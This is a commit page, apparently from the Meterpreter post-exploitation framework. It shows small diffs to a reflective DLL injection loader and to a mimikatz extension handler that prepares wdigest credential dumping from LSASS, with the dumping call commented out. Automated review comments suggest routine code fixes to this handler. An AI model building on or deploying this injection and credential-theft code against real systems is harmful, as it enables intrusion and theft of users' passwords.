
Working comms

Meatballs 2013-04-19 22:18:44 +01:00
parent 21e2b1fecf
commit 39872d239b
4 changed files with 15 additions and 20 deletions
c/meterpreter/source
ReflectiveDLLInjection
common
extensions/mimikatz

@ -183,7 +183,7 @@ geteip:
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH || dwHashValue == VIRTUALLOCK_HASH || dwHashValue == OUTPUTDEBUG_HASH )

@ -63,7 +63,7 @@ __forceinline DWORD ror( DWORD d )
__forceinline DWORD hash( char * c )
__forceinline DWORD _hash( char * c )
{
register DWORD h = 0;
do

@ -203,7 +203,7 @@ static void real_dprintf(char *format, ...) {
va_start(args,format);
vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
strcat_s(buffer, sizeof(buffer), "\r\n");
OutputDebugString(buffer);
OutputDebugStringA(buffer);
}
#endif
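Review bot: `va_start(args,format)` in real_dprintf has no matching `va_end` before the closing brace shown in this hunk, which the C standard treats as undefined behaviour; add `va_end(args);` directly after the `vsnprintf_s` call. The switch to `OutputDebugStringA` is consistent with the `char` buffer, but the return value of `vsnprintf_s` is still ignored, so a message truncated at `sizeof(buffer)-3` is emitted with no indication that it was cut. The declarations of `args` and `buffer` sit above the hunk, so the buffer size cannot be checked from here.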

@ -36,31 +36,26 @@ EnableDelayLoadMetSrv();
DWORD request_boiler(Remote *remote, Packet *packet)
{
packet_transmit_response(0, remote, packet);
FILE *ficheiro = fopen("c:\\test.txt", "wb");
fclose(ficheiro);
std::wofstream logFile( "c:\\out.txt");
std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf());
std::wstreambuf *errbuf = std::wcerr.rdbuf(logFile.rdbuf());
Packet * response = packet_create_response(packet);
bool result = 0;
//std::wofstream logFile( "c:\\out.txt");
//std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf());
//std::wstreambuf *errbuf = std::wcerr.rdbuf(logFile.rdbuf());
vector<wstring> * mesArguments = new vector<wstring>();
mimikatz * myMimiKatz = new mimikatz(mesArguments);
//mimikatz * myMimiKatz = new mimikatz(mesArguments);
vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData, wstring(L"wdigest")));
//result = mod_mimikatz_sekurlsa_wdigest::getWDigest(mesArguments);
/*
if (mod_mimikatz_sekurlsa::searchLSASSDatas())
{
mod_mimikatz_sekurlsa::getLogonData(mesArguments, &monProvider);
}
std::wcout.rdbuf(outbuf);
std::wcerr.rdbuf(errbuf);
packet_transmit_response(0, remote, packet);
return 0;
}*/
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
Command customCommands[] =
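Review bot: `mesArguments` is allocated with `new vector<wstring>()` on every call to request_boiler and never deleted, and with the `mimikatz` constructor and the `getLogonData` block commented out nothing visible consumes it; a stack object, `vector<wstring> mesArguments;`, would remove the per-request leak. The pointer returned by `packet_create_response(packet)` is handed to `packet_transmit_response` without a NULL check, which matters if that helper can fail on allocation. The page has lost its +/- markers, so this reads the new side as the version ending in `return ERROR_SUCCESS;`. The large commented-out region would be better deleted or guarded by a build flag than left in the handler.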